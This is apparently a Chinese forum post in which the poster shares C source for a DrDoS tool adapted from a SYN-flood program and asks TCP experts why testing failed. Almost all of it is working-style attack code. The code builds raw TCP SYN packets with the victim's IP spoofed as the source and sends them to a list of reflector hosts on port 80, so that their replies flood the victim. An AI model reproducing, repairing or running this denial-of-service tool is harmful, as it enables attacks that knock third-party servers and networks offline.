根据TOMYCHEN提供的synflood改的DrDoS。郁闷,测试不成功。哪位精通TCP老兄给指点指点
代码:
//FileName:DRDos.c //Author:Unknow //Modify:Tomy.Chen //last modify:SysHu0teR //LastTime:2004-11-28 12:57 //Description: //Synflood DoS attack,and this version support and win32 //compile with linux need the "pthread" lib //compiled on vc++ 6.0 and gcc 3.2.2 #include<stdio.h> #ifdef WIN32 #include <winsock2.h> #include <Ws2tcpip.h> #include <windows.h> #include <stdio.h> #pragma comment(lib,"ws2_32") #pragma comment(lib,"wsock32")
#else
#include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <pthread.h> #include <errno.h>
#endif
#ifndef WIN32 #define USHORT unsigned short #define SOCKET int #define DWORD unsigned long #define UCHAR unsigned char #define HANDLE int #define INVALID_SOCKET (SOCKET)(~0) #define SOCKET_ERROR (-1) #define GetLastError() errno #define WSAGetLastError() errno #endif
#define bool int #define true 1 #define false 0 // #define SERVER_IP "61.129.81.210" //这是上面我所说的所谓的大量节点 更改 #define SEQ 0x28376839 #define LOG "===============Begin====================\n" USHORT checksum(USHORT *buffer, int size); int flood();
typedef struct tcphdr { USHORT th_sport; USHORT th_dport; unsigned int th_seq; unsigned int th_ack; unsigned char th_lenres; unsigned char th_flag; USHORT th_win; USHORT th_sum; USHORT th_urp; }TCP_HEADER;
typedef struct iphdr { unsigned char h_verlen; unsigned char tos; unsigned short total_len; unsigned short ident; unsigned short frag_and_flags; unsigned char ttl; unsigned char proto; unsigned short checksum; unsigned int sourceIP; unsigned int destIP; }IP_HEADER;
struct { unsigned long saddr; unsigned long daddr; char mbz; char ptcl; unsigned short tcpl; }PSD_HEADER;
#ifdef WIN32 WSADATA wsaData; #endif SOCKET sockMain; int ErrorCode=0,flag=true,TimeOut=2000,ServerIpNet,ServerIpHost,dataSize=0,SendSEQ=0; //更改 int portNum=0; unsigned short activPort=40000; struct sockaddr_in sockAddr; TCP_HEADER tcpheader; IP_HEADER ipheader; char sendBuf[128];
USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while(size >1) { cksum+=*buffer++; size-=sizeof(USHORT); } if(size) cksum+=*(UCHAR*)buffer; cksum=(cksum >> 16)+(cksum&0xffff); cksum+=(cksum >>16); return (USHORT)(~cksum); }
int main(int argc,char* argv[]) { #ifndef WIN32 pthread_attr_t attr; pthread_t tid; #endif
DWORD dw; HANDLE hThread=0; char putInfo;
if(argc!=3) { printf("%s\n",LOG); printf("Invalid command,Pls use:\n%s <IP> <port> <iplist_file>\nExample:%s 192.168.100.244 80 ip.txt\n",argv[0],argv[0]); return 1; } #ifdef WIN32 if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){ printf("WSAStartup failed: %d\n",ErrorCode); return 2; } #endif sockMain=socket(PF_INET,SOCK_RAW,IPPROTO_RAW); if(sockMain==INVALID_SOCKET) { printf("Socket failed: %d\n",WSAGetLastError()); return 3; } ErrorCode=setsockopt(sockMain,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int)); if(ErrorCode==SOCKET_ERROR) { printf("Set sockopt failed: %d\n",WSAGetLastError()); return 4; } #ifdef WIN32 ErrorCode=setsockopt(sockMain,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut)); if(ErrorCode==SOCKET_ERROR) { printf("Set sockopt time out failed: %d\n",WSAGetLastError()); return 5; } #endif portNum=atoi(argv[2]); //要攻击IP的哪个端口?
// memset(&sockAddr,0,sizeof(sockAddr)); // sockAddr.sin_family=AF_INET; // sockAddr.sin_addr.s_addr =inet_addr(SERVER_IP); // ServerIpNet=inet_addr(SERVER_IP); //更改 // ServerIpHost=ntohl(ServerIpNet); //更改
ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long)); ipheader.total_len = htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); ipheader.ident = 1; ipheader.frag_and_flags = 0; ipheader.ttl = 128; ipheader.proto = IPPROTO_TCP; ipheader.checksum =0; ipheader.sourceIP = inet_addr(argv[1]); //这里的源地址就是要攻击的地址 ipheader.destIP = inet_addr(argv[1]); //根据理论,目标地址就是网络节点
tcpheader.th_dport=htons(80); //给网络节点的80端口发送包, tcpheader.th_sport = htons(portNum); tcpheader.th_seq = htonl(SEQ+SendSEQ); tcpheader.th_ack = 0; tcpheader.th_lenres =(sizeof(TCP_HEADER)/4<<4|0); tcpheader.th_flag = 2; tcpheader.th_win = htons(65534);//16384); tcpheader.th_urp = 0; tcpheader.th_sum = 0;
//下面是伪首部 PSD_HEADER.saddr=ipheader.sourceIP; PSD_HEADER.daddr=ipheader.destIP; PSD_HEADER.mbz=0; PSD_HEADER.ptcl=IPPROTO_TCP; PSD_HEADER.tcpl=htons(sizeof(tcpheader)); printf("%s\n",LOG); #ifdef WIN32 hThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)flood,0,CREATE_SUSPENDED,&dw); SetThreadPriority(hThread,THREAD_PRIORITY_HIGHEST); ResumeThread(hThread); #else pthread_attr_init(&attr); pthread_attr_setscope(&attr, PTHREAD_SCOPE_SYSTEM); hThread = pthread_create(&tid,NULL,(void*)flood,NULL); #endif
printf("Warning[start]...........\nPress any key to stop!\n"); putInfo=getchar(); #ifdef WIN32 TerminateThread(hThread,0); WSACleanup(); #else pthread_exit((void*)hThread); #endif
printf("\nStopd...........\n");
return 0; }
int flood() { FILE *list; char serverip[20];
while(1) { list=fopen("d:\ip.txt","r"); while(!feof(list)) { fscanf(list,"%s",serverip);
if(SendSEQ++==65536) SendSEQ=1; //if(activPort++==40010) activPort=1000; memset(&sockAddr,0,sizeof(sockAddr)); sockAddr.sin_family=AF_INET; sockAddr.sin_addr.s_addr =inet_addr(serverip); ipheader.checksum =0; ipheader.destIP = inet_addr(serverip); //变换网络节点IP tcpheader.th_seq = htonl(SEQ+SendSEQ); //tcpheader.th_sport = htons(activPort); tcpheader.th_sum = 0; PSD_HEADER.daddr=ipheader.destIP; //同上 memcpy(sendBuf,&PSD_HEADER,sizeof(PSD_HEADER)); memcpy(sendBuf+sizeof(PSD_HEADER),&tcpheader,sizeof(tcpheader)); tcpheader.th_sum=checksum((USHORT *)sendBuf,sizeof(PSD_HEADER)+sizeof(tcpheader));
memcpy(sendBuf,&ipheader,sizeof(ipheader)); memcpy(sendBuf+sizeof(ipheader),&tcpheader,sizeof(tcpheader)); memset(sendBuf+sizeof(ipheader)+sizeof(tcpheader),0,4); dataSize=sizeof(ipheader)+sizeof(tcpheader); ipheader.checksum=checksum((USHORT *)sendBuf,dataSize); memcpy(sendBuf,&ipheader,sizeof(ipheader)); ErrorCode=sendto(sockMain,sendBuf,dataSize,0,(struct sockaddr*) &sockAddr,sizeof(sockAddr)); Sleep(1); } fclose(list); if(ErrorCode==SOCKET_ERROR) { printf("\nCan't connect this IP!Pls check it.\n"); #ifdef WIN32 ExitThread(1); #else pthread_exit((void*)1); #endif } // Sleep(1000); } return 0; }
|